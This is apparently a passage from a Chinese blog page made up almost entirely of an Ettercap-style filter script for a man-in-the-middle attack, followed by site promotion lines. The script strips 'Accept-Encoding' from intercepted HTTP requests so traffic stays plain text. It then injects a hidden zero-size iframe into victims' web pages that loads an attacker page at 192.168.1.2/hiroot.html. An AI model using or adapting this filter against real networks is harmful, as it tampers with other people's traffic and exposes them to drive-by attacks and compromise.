if (ip.proto == TCP && ip.dst != '192.168.1.2' && tcp.dst == 80 || tcp.dst == 8080) {
#...and if it contains an Accept-Encoding header...
if (search(DATA.data, "Accept-Encoding")) {
#...remove any Encoding (make sure we are using plain text)
replace("Accept-Encoding", "Accept-Nothing!");
}
}
#--Inject Iframe--
if (ip.proto == TCP && ip.dst != '192.168.1.2' && tcp.src == 80 || tcp.src == 8080) {
if (search(DATA.data, "<body>")){
#Replace it with the body tag and an iframe to our attacking webpage
replace("<body>","<body><iframe src='http://192.168.1.2/hiroot.html' width=0 height=0 />");
msg("iframe injected after <body>\n");
}
if (search(DATA.data, "<BODY>")){
replace("<BODY>","<BODY><IFRAME SRC='http://192.168.1.2/hiroot.html' width=0 height=0 />");
msg("iframe injected after <BODY>\n");
}
}
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步